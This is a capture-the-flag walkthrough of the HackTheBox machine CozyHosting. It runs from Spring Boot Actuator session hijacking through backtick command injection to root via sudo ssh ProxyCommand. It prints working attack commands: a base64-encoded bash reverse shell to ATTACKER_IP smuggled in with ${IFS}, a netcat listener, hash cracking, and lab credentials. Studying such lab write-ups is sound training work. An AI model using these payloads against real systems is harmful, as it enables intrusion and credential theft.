CozyHosting is an Easy-rated Linux machine on HackTheBox that features a Java-based web application with misconfigured Spring Boot Actuator endpoints. The attack path involves leveraging exposed session data to gain administrative access, exploiting an OS command injection vulnerability to obtain a foothold, and pivoting through credential reuse to ultimately escalate privileges to root.
Difficulty: Easy (Linux)
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
80/tcp open http nginx 1.18.0 (Ubuntu)
Port 80 redirects to http://cozyhosting.htb — a hosting platform landing page served by nginx. SSH is available on port 22.
Visiting /error returns a Spring Boot Whitelabel Error Page, identifying the backend framework:
Whitelabel Error Page
This application has no explicit mapping for /error, so you are seeing this as a fallback.
Using feroxbuster with a Spring Boot–specific wordlist:
feroxbuster --url http://cozyhosting.htb \
--wordlist=/usr/share/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt
Key findings:
| Endpoint | Status | Description |
|---|---|---|
/actuator | 200 | Spring Boot Actuator index |
/actuator/env | 200 | Environment properties (values masked) |
/actuator/sessions | 200 | Active HTTP sessions |
/actuator/mappings | 200 | Registered request mappings |
/actuator/beans | 200 | Application bean definitions |
/actuator/health | 200 | Health check endpoint |
/login | 200 | Login page |
The exposed Actuator endpoints reveal extensive application internals. The /actuator/env output confirms a PostgreSQL backend (spring.datasource.* properties) and identifies the application jar as cloudhosting-0.0.1.jar.
The /actuator/sessions endpoint exposes active session IDs:
{
"855364B960FB1C04CF7835B2FFBD3ABA": "UNAUTHORIZED",
"DCCBC9C135A4D806D606B8864DB32A1B": "kanderson"
}
User kanderson has an active authenticated session. Setting the JSESSIONID cookie in the browser grants access to the admin dashboard at /admin:
document.cookie = "JSESSIONID=DCCBC9C135A4D806D606B8864DB32A1B"
The admin dashboard contains a "Connection settings" form with Hostname and Username fields. This form triggers an SSH command on the backend.
Testing backtick injection in the Username field confirms command execution:
Hostname: 127.0.0.1
Username: `id`
Response:
ssh: Could not resolve hostname uid=1001(app): Name or service not known
The output of id is embedded in the SSH error — confirming OS command injection.
Spaces are rejected in the Username field. Bypass using ${IFS} as a space substitute and base64 encoding for the payload:
# Encode reverse shell
echo -n "bash -i >& /dev/tcp/ATTACKER_IP/1338 0>&1" | base64
# => YmFzaCAtaSA+JiAvZGV2L3RjcC9BVFRBQ0tFUl9JUC8xMzM4IDA+JjE=
# Listener
nc -lvnp 1338
Username payload:
`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC9BVFRBQ0tFUl9JUC8xMzM4IDA+JjE=|base64${IFS}-d|bash`
Shell received as app (uid=1001).
The application jar is located at /app/cloudhosting-0.0.1.jar. Extracting application.properties reveals PostgreSQL credentials:
unzip -p cloudhosting-0.0.1.jar BOOT-INF/classes/application.properties
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
psql -h 127.0.0.1 -U postgres -d cozyhosting -W
Dumping the users table:
SELECT * FROM users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$E/Vcd9ecflmPudWeLSEIv.cvK6QjxjWlWXpij1NVNV3Mm6eH58zim | User
admin | $2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm | Admin
The admin password is a bcrypt hash. Cracking with hashcat:
echo '$2a$10$SpKYdHLB0FOaT7n3x72wtuS0yR8uqqbNNpIPjUb2MZib3H9kVO8dm' > hash.txt
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
Result: manchesterunited
Checking /etc/passwd reveals a system user josh (uid=1003). The cracked admin password is reused for SSH:
ssh [email protected]
# Password: manchesterunited
josh@cozyhosting:~$ sudo -l
User josh may run the following commands on cozyhosting:
(root) /usr/bin/ssh *
Josh can run ssh as root. The ProxyCommand option allows arbitrary command execution:
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
Root shell obtained.
| Flag | Hash |
|---|---|
| User | 94e1fd872f6d72e66475c39de165xxxx |
| Root | 74359c82428b875194d675317d27xxxx |
Nmap → nginx on port 80 → Spring Boot (Whitelabel error page)
→ Feroxbuster with Spring Boot wordlist → Actuator endpoints exposed
→ /actuator/sessions → session hijack as kanderson → admin dashboard
→ Command injection in SSH Username field (backtick injection)
→ Reverse shell as app (uid=1001)
→ DB creds from application.properties → PostgreSQL enumeration
→ Bcrypt hash cracked (manchesterunited) → SSH as josh
→ sudo ssh ProxyCommand → root